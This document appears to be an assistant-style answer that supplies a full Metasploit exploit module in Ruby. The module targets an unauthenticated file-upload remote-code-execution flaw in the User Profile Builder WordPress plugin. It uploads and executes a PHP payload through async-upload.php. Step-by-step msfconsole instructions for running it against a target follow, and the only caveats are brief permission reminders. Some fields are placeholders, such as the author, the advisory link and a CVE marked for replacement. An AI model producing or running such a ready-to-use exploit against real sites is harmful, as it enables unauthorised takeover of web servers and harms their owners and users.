To create a Metasploit module to exploit the RCE vulnerability in the User Profile Builder WordPress plugin before version 3.11.8, we need to take advantage of the lack of proper authorization in the media file upload functionality. Here is how you can create such a Metasploit module:

Metasploit Module

Save the following code as wordpress_user_profile_builder_rce.rb in the modules/exploits/unix/webapp directory of your Metasploit Framework installation.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress User Profile Builder Unauthenticated File Upload RCE',
      'Description'    => %q{
        This module exploits a vulnerability in the User Profile Builder WordPress plugin before version 3.11.8.
        The plugin does not have proper authorization, allowing unauthenticated users to upload media files via
        the async upload functionality. This can be leveraged to upload and execute a malicious PHP payload.
      },
      'Author'         =>
        [
          'Your Name'  # OneArch
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2024-6366'],  # Replace with the actual CVE identifier
          ['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'WordPress User Profile Builder < 3.11.8', {} ]
        ],
      'DisclosureDate' => 'Aug 03 2024',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The base path to the WordPress installation", '/']),
      ])
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path),
    })

    if res && res.body.include?('wp-content/plugins/user-profile-builder')
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_payload = "<?php #{payload.encoded} ?>"
    data = Rex::MIME::Message.new
    data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"async-upload\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.php\"")
    data.add_part('1', nil, nil, 'form-data; name="html-upload"')
    data.add_part('Upload', nil, nil, 'form-data; name="upload"')

    print_status("Uploading PHP payload...")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => normalize_uri(target_uri.path, 'wp-admin', 'async-upload.php'),
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => data.to_s
    })

    if res && res.code == 200 && res.body.include?('.php')
      php_path = res.body.match(/(\/wp-content\/uploads\/[0-9]+\/[0-9]+\/.*?\.php)/)[1]
      print_good("Payload uploaded successfully: #{php_path}")

      register_files_for_cleanup(php_path)
      execute_command("#{php_path}")
    else
      fail_with(Failure::UnexpectedReply, 'Failed to upload payload')
    end
  end

  def execute_command(php_path)
    print_status("Executing PHP payload...")
    send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, php_path)
    })
  end
end

Usage Instructions

1. Save the Module: Save the module as wordpress_user_profile_builder_rce.rb in the modules/exploits/unix/webapp directory of your Metasploit Framework installation.

   /path/to/metasploit-framework/modules/exploits/unix/webapp/wordpress_user_profile_builder_rce.rb

2. Load Metasploit: Start Metasploit Framework by opening a terminal and running:

   msfconsole

3. Use the New Module: In the Metasploit console, load the new exploit module using the following command:

   use exploit/unix/webapp/wordpress_user_profile_builder_rce

4. Configure and Run: Set the necessary options, such as RHOSTS and TARGETURI. Then run the exploit.

   msf6 > use exploit/unix/webapp/wordpress_user_profile_builder_rce
   msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > set RHOSTS target_ip
   RHOSTS => target_ip
   msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > set TARGETURI /
   TARGETURI => /
   msf6 exploit(unix/webapp/wordpress_user_profile_builder_rce) > run

Important Considerations

• Ensure you have the appropriate permissions before testing or exploiting any systems.
• This module is a basic template and may require modifications to work against a specific setup or to achieve a particular goal.
• Always test the module in a safe and controlled environment before using it on any production systems.

This Metasploit module uploads a malicious PHP file to the vulnerable WordPress installation and then executes it to achieve remote code execution. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.